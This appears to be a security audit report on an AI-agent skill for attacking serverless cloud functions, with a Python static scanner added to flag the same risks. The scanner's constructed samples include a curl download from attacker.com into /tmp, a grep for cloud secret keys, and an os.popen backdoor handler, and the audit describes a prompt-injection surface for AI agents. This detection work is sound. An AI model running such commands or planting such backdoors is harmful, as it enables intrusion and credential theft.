serverless-attack
Fail
Audited by Gen Agent Trust Hub on Apr 22, 2026
Risk Level: HIGH
Tags: EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill instructs the agent to download external binaries (e.g., fscan) from an untrusted domain (attacker.com) directly into the function's /tmp directory.
- [COMMAND_EXECUTION]: Provides instructions to execute a wide variety of shell commands and cloud CLI tools (aws, tccli) for resource enumeration, configuration modification, and local binary execution.
- [REMOTE_CODE_EXECUTION]: Includes a complete template for a Python backdoor designed to be injected into cloud functions, using os.popen() to execute arbitrary system commands supplied through function events.
- [DATA_EXFILTRATION]: Focuses on identifying and extracting sensitive credentials, including database passwords, API keys, and cloud environment tokens (AK/SK, session tokens), from environment variables and source code.
- [PROMPT_INJECTION]: The skill exposes an indirect prompt injection surface by ingesting and processing untrusted source code and configuration files during its auditing phase.
  - Ingestion points: Local function code (lambda_code/) and configuration files analyzed via grep and cat.
  - Boundary markers: Absent; the instructions neither delimit external content nor tell the agent to ignore instructions embedded in it.
  - Capability inventory: Includes cloud configuration updates (update-function-code), network operations (curl), and shell command execution.
  - Sanitization: Absent; the skill does not suggest validation or escaping of the data being analyzed.
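A reviewer who wants to reproduce the findings above on another skill bundle needs a repeatable check rather than a manual read. The script below is an added example, not code from this audit, from the Trust Hub, or from the audited skill. It scans a skill's instruction text for three of the indicator classes (download of a binary into /tmp from an external host, aws/tccli invocations including update-function-code, credential-bearing environment variable names) and parses any shipped Python with the ast module to find os.popen/os.system/subprocess sinks fed from a handler's event parameter, which is the backdoor pattern the REMOTE_CODE_EXECUTION finding describes. The regex patterns, the taint rule (first parameter of every function is the untrusted event, propagated through plain assignments) and the risk mapping are assumptions made for this example; all sample inputs are constructed, and attacker.com is the placeholder domain from the analysis.

```python
"""Static indicator scan for the finding classes in this audit.

Added example: not code from the audit, the Trust Hub, or the audited skill.
Inputs are a skill's instruction text plus the Python sources of any function
code it ships. All sample inputs below are constructed for the example.
"""
import ast
import re

# Heuristic patterns (assumptions made for this example, not the auditor's rules).
DOWNLOAD_TOOL_RE = re.compile(r"\b(?:curl|wget)\b")
URL_HOST_RE = re.compile(r"https?://([^\s/'\"]+)")
CLOUD_CLI_RE = re.compile(r"\b(?:aws|tccli)\b\s+[\w-]+(?:\s+[\w-]+)?")
CRED_ENV_RE = re.compile(
    r"\b[A-Z0-9_]*(?:SECRET|TOKEN|PASSWORD|PASSWD|ACCESS_KEY|API_KEY)[A-Z0-9_]*\b")
SHELL_SINKS = {("os", "popen"), ("os", "system"), ("subprocess", "run"),
               ("subprocess", "Popen"), ("subprocess", "call"),
               ("subprocess", "check_output")}


def scan_text(text):
    """Line-by-line indicators in skill instructions, keyed by the audit's tags."""
    findings = {"EXTERNAL_DOWNLOADS": [], "COMMAND_EXECUTION": [],
                "DATA_EXFILTRATION": []}
    for n, line in enumerate(text.splitlines(), 1):
        # binary fetched from the network and written under /tmp
        if DOWNLOAD_TOOL_RE.search(line) and "/tmp" in line:
            for host in URL_HOST_RE.findall(line):
                findings["EXTERNAL_DOWNLOADS"].append((n, host))
        # cloud CLI invocations, including update-function-code
        for m in CLOUD_CLI_RE.finditer(line):
            findings["COMMAND_EXECUTION"].append((n, m.group(0)))
        # credential-bearing environment variable names being read or grepped
        for m in CRED_ENV_RE.finditer(line):
            findings["DATA_EXFILTRATION"].append((n, m.group(0)))
    return findings


def _refs(node, names):
    """True if any Name in the subtree is one of `names`."""
    return any(isinstance(n, ast.Name) and n.id in names for n in ast.walk(node))


def _sink(func):
    """('os', 'popen') for an `os.popen(...)` call target, else None."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    return None


def find_event_to_shell(source):
    """[(lineno, 'os.popen'), ...] for shell sinks whose arguments derive from
    a handler's first parameter (assumed to be the function event)."""
    hits = []
    for fn in ast.walk(ast.parse(source)):
        if not isinstance(fn, ast.FunctionDef) or not fn.args.args:
            continue
        tainted = {fn.args.args[0].arg}
        changed = True
        while changed:  # propagate taint through simple assignments to a fixpoint
            changed = False
            for node in ast.walk(fn):
                if isinstance(node, ast.Assign) and _refs(node.value, tainted):
                    for t in node.targets:
                        if isinstance(t, ast.Name) and t.id not in tainted:
                            tainted.add(t.id)
                            changed = True
        for call in ast.walk(fn):
            if isinstance(call, ast.Call) and _sink(call.func) in SHELL_SINKS:
                if any(_refs(a, tainted) for a in call.args):
                    hits.append((call.lineno, ".".join(_sink(call.func))))
    return hits


def audit(skill_text, python_sources):
    """Combine both scans into the tag list and a risk level (mapping assumed here)."""
    text = scan_text(skill_text)
    tags = {tag for tag, hits in text.items() if hits}
    rce = [h for src in python_sources for h in find_event_to_shell(src)]
    if rce:
        tags.add("REMOTE_CODE_EXECUTION")
    risk = ("HIGH" if tags & {"REMOTE_CODE_EXECUTION", "EXTERNAL_DOWNLOADS"}
            else "MEDIUM" if tags else "LOW")
    return {"risk": risk, "tags": sorted(tags), "text": text, "rce": rce}


# Constructed samples (not the audited skill's content).
SKILL_SAMPLE = """\
# constructed skill instructions
cd /tmp && curl -o /tmp/fscan http://attacker.com/fscan && chmod +x /tmp/fscan
aws lambda get-function-configuration --function-name target
tccli scf GetFunction --FunctionName target
env | grep -E 'AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN|TENCENTCLOUD_SECRETKEY'
aws lambda update-function-code --function-name target --zip-file fileb://payload.zip
"""
BACKDOOR_SAMPLE = """\
import os

def handler(event, context):
    cmd = event.get("cmd", "id")          # command chosen by whoever invokes the function
    return {"output": os.popen(cmd).read()}
"""
BENIGN_SAMPLE = """\
import os

def handler(event, context):
    host = os.popen("uname -n").read()     # fixed command, not event-derived
    return {"host": host, "echo": event.get("msg")}
"""

if __name__ == "__main__":
    import json
    print(json.dumps(audit(SKILL_SAMPLE, [BACKDOOR_SAMPLE, BENIGN_SAMPLE]), indent=2))
```

Running the file prints the combined verdict for the constructed samples: HIGH, with all four code-related tags, one download from attacker.com, three CLI invocations, three credential variable names, and a single os.popen sink on line 5 of the backdoor sample while the benign handler (constant command string) produces no hit. The regexes are deliberately narrow; the point is the event-to-sink taint check, which is what separates a backdoor from an ordinary handler that happens to shell out.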
Recommendations
- AI detected serious security threats
Audit Metadata